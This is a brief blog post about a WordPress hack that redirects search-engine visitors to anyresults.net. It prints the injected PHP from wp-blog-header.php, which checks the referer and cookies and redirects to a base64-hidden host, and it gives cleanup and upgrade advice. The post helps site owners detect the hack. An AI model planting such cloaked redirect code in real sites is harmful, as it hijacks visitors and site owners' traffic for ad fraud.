WordPress Security

WordPress AnyResults.net Hack – Search Engine Visits Redirecting to AnyResults.net

Many sites that are running wordpress blogs have been hacked by a very clever and hidden PHP Injection which is redircting all requests from google, msn, live, altavista, ask, yahoo, and other search engines and redirecting it to ‘anyresults.net’ a site filled with pay-per-click ads and redirects to other landing pages. This is a very clever trick as visiting a web site either through a direct navigation type in or a bookmark does not display the problem. Only search engine visits are redirected and many site owners are delayed at discovering this problem untill they notice huge dips in traffic or revenue stats.

Many blogs and discussions on this provide very little help in finding this exploit. Some talk about a plug-in file as the colprete, some a wp-options table in the database, none of which were very helpful in this case.

If your blog is effected by this hack check your wp-blog-header.php file for the following code:

<?php \ $seref=array("google","msn","live","altavista","ask","yahoo","aol","cnn","weather","alexa"); $ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser="1"; break; } if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }?>

Remove it completely or comment it out.

This code is using a base64 value for the string ‘anyresults.net’ which made it much more difficult to find the redirect string in any of the files.

It is recommended that you upgrade all of your WordPress sites to the most current and stable version immediately. This attack is possible for any sites not running the latest version of wordpress so you can understand the urgency of upgrading wordpress sites.

While seeking solutions I discover some more good ideas on keeping your wordpress site safe on Matt Cutts blog topic: Three Tips to Protect Your WordPress Installation.